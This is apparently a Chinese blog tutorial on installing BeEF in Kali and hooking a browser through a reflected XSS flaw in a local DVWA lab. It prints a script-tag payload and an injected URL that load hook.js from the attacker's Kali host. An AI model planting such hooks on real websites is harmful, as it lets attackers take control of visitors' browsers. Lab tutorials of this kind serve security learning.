首页 > 其他分享 >beef xss

beef xss

时间:2023-04-16 16:25:47浏览次数:42  
标签:xss 浏览器 beef kali dvwa 模块

1、介绍

kali工具之Beef – FreeBuf网络安全行业门户

早期版本kali默认安装,后来则需要手动安装

Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)_半个西瓜.的博客-CSDN博客_beef工具

2、安装

(1)切换root用户

sudo su
  • 密码也是kali

(2)更新

apt update
  • 这一步是有必要的,否则可能下载不完整,报错

(3)安装

apt install beef-xss
  • 注意不是直接的beef
  • 安装过程有遇到询问是否ask,默认的是NO,手动选择YES

(4)启动

beef-xss
  • 首次启动,会要求输入设置密码,不能是beef。我这里设置123456
  • 启动成功之后会自动打开浏览器,账户名为beef,密码即新设的123456

3、使用

(1)说明

在存在xss漏洞处,置入如下payload,127.0.0.1是指beef-xss安装的主机,即在用户浏览器执行xss时加载外部js-hook.js文件。

<script src="http://127.0.0.1:3000/hook.js"></script>

(2)dvwa 反射型xss low演示

dvwa是部署在本地主机phpstudy环境中,ip:192.168.93.1

kali是vm虚拟机,192.168.93.136

在本地主机浏览器登录dvwa,设置low等级,然后访问,此时beef网页出现了请求该hook.js文件的主机

http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=%27%3E%3Cscript%20src=http://192.168.93.136:3000/hook.js%3E%3C/script%3E

4、解读

5、命令操作

kali工具之Beef – 知乎 (zhihu.com)

beef提供快捷的命令进行攻击和利用。

绿色模块:表示模块适用当前用户,并且执行结果对用户不可见 红色模块:表示模块不适用当前用户,有些红色模块也可以执行 橙色模块:模块可用,但结果对用户可见 灰色模块:模块为在目标浏览器上测试过

 

标签:xss,浏览器,beef,kali,dvwa,模块
From: https://www.cnblogs.com/wd404/p/17323457.html

相关文章

  • xss反射型和存储型
    1、反射型1.1发生场景目标网站某处,用户可以get或post基于url的直接参数或路径参数提交数据,或者get或post基于表单form提交数据。(具体取决于服务端接收的编程方法)服务端接收到数据后,未经过充分检测,将其写入到响应的html页面中。如果该数据是攻击者构造的payload,可以包含某些......
  • xss
    1、定义xss,crosssitescript跨站脚本攻击,是在用户的客户端上解析攻击者构造的payload作为脚本执行,从而造成危害。(1)用户的客户端xss攻击的实际阶段,发生在客户端一侧,而非服务端。当然,攻击过程可能会要求服务端的参与客户端一般是指浏览器,但广义上包括其他可以解析脚本的程序......
  • XSS
    跨站脚本攻击XSS1.XSS简介跨站脚本(crosssitescript)为了避免与样式css混淆,所以简称为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。"那么什么是XSS呢?XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而......
  • debian-kali 安装beef-xss (启动状态为failed)
    文档来自大佬https://www.cnblogs.com/xiatian09/p/9791040.html本人仅是自己做个记录给自己看,不喜欢的看的×这个界面就可以了,勿喷废话少说先看图问题和图└─#beef-xss[-]YouareusingtheDefaultcredentials[-](Passwordmustbedifferentfrom"beef")[-]Pleas......
  • xss Payload
    十进制值 URL编码 介绍47 %2F 正斜杠13 %0D 回车12 %0C ......
  • 02-xss固定会话攻击
    xss学习可以步骤参考:https://www.cnblogs.com/tangtou/p/17281696.html目录原理xss平台cookie窃取和欺骗影响固定会话攻击防御原理用户会话令牌利用cookie来实现,cookie是存储在浏览器端的一小段文本,相当于身份证,会有窃取和欺骗的风险可以利用xss攻击窃取浏览器里的cookie信息......
  • Webug——过滤xss
    同反射型xss相同在url参数id中进行xss攻击http://192.168.75.146/control/xss/filter_xss.php?id=<script>alert(xss)</script>不过根据反馈script被过滤了我们就......
  • 项目中如何对XSS统一处理
    XSS攻击是什么?XSS攻击是指攻击者利用网站中的漏洞,向页面中注入恶意脚本,从而获取用户的信息或者控制用户的计算机。举一个通俗的例子,早期使用JSP页面渲染页面的项目,如果将......
  • xss跨站脚本
    跨站脚本(英语:Cross-sitescripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响......
  • wolvctf 2023 zombie xss
    当时做的时候没想到这道题考的是XSS,归结原因在于对nodejs的代码不熟悉。先上源码:bot.js源码就不放了,主要功能概括一下就是点击用户提交的链接,把flag放到cookie里传过去,很......